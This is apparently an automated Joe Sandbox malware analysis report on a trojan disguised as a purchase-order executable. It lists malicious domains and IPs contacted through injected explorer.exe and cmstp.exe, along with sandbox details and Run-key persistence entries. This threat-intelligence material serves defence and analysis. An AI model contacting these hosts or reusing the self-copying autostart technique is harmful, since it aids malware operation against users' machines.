http://www.texanboxes.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.hugedomains.com/domain_profile.cfm?d=pure1027.com	explorer.exe, 00000008.00000002.3389406505.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.3367455817.000000000517F000.00000004.10000000.00040000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.martline.website/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	15%, Virustotal, Browse	unknown
http://www.emeraldsurrogatefabric.com/btrd/www.pure1027.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	true		unknown
http://www.xmentorgroup.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.outletivo.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://www.rd8.online	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.rd8.online/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://www.0757hunyin.net/btrd/www.texanboxes.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/e	explorer.exe, 00000008.00000002.3377674269.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074869572.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2979140509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2186408127.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002701000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002351000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002911000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.000000000337C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.outletivo.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pure1027.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.outletivo.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.anangtoto.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xmentorgroup.com/btrd/www.outletivo.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.outletivo.com/btrd/www.martline.website	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.naddafornadda.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thecolourgrey.com/btrd/www.anangtoto.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.researchforhighschool.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.researchforhighschool.com/btrd/www.invest247on.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.martline.websiteReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.invest247on.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000008.00000002.3385226475.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.emeraldsurrogatefabric.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	true	8%, Virustotal, Browse	unknown
http://www.watch2movie.xyz/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
https://outlook.come	explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thecolourgrey.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000008.00000002.3377674269.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3074869572.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2979140509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2186408127.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pure1027.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://www.thecolourgrey.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cnoszirzbkaqz.com/btrd/www.thebestanglephotography.online	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xmentorgroup.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.anangtoto.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.invest247on.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cnoszirzbkaqz.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.emeraldsurrogatefabric.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	true		unknown
https://api.msn.com/I	explorer.exe, 00000008.00000002.3377674269.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.texanboxes.com/btrd/www.watch2movie.xyz	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.xmentorgroup.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cnoszirzbkaqz.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.martline.website/btrd/www.naddafornadda.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cnoszirzbkaqz.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000008.00000000.2180118675.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3367289730.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3374312359.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.0757hunyin.net/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.watch2movie.xyz	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.0757hunyin.netReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.texanboxes.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.invest247on.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rd8.onlineReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pure1027.com/btrd/www.thecolourgrey.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.researchforhighschool.com/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rd8.online/btrd/www.researchforhighschool.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.naddafornadda.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.martline.website	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pure1027.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.0757hunyin.net	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thecolourgrey.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.watch2movie.xyz/btrd/www.cnoszirzbkaqz.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.anangtoto.com/btrd/www.0757hunyin.net	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com-	explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://youngonven.com	PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002701000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.00000000022EC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002351000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002911000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.000000000337C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.naddafornadda.com/btrd/	explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.anangtoto.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.invest247on.com/btrd/www.xmentorgroup.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thebestanglephotography.onlineReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comEMd	explorer.exe, 00000008.00000002.3385226475.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.texanboxes.comReferer:	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thebestanglephotography.online/btrd/	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
63.250.38.167	youngonven.com	United States	22612	NAMECHEAP-NETUS	false
34.205.242.146	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	true
192.243.59.20	www.emeraldsurrogatefabric.com	Dominica	39572	ADVANCEDHOSTERS-ASNL	true
104.21.93.17	www.thecolourgrey.com	United States	13335	CLOUDFLARENETUS	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528882
Start date and time:	2024-10-08 11:29:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	86
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PURCHASED ORDER OF ENG091.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@474/15@7/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 63 Number of non-executed functions: 364
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:30:07	API Interceptor	1x Sleep call for process: PURCHASED ORDER OF ENG091.exe modified
05:30:20	API Interceptor	1741290x Sleep call for process: explorer.exe modified
05:30:23	API Interceptor	2x Sleep call for process: PURCHASED ORDER OF ENG091.pif modified
05:30:39	API Interceptor	2x Sleep call for process: PURCHASED ORDER OF ENG091.pif.pif modified
05:30:50	API Interceptor	1973167x Sleep call for process: cmstp.exe modified
05:31:00	API Interceptor	2x Sleep call for process: PURCHASED ORDER OF ENG091.pif.pif.pif modified
05:31:16	API Interceptor	2x Sleep call for process: PURCHASED ORDER OF ENG091.pif.pif.pif.pif modified
11:30:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091 C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif
11:30:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091 C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif
11:30:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif
11:30:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PURCHASED ORDER OF ENG091.pif C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif
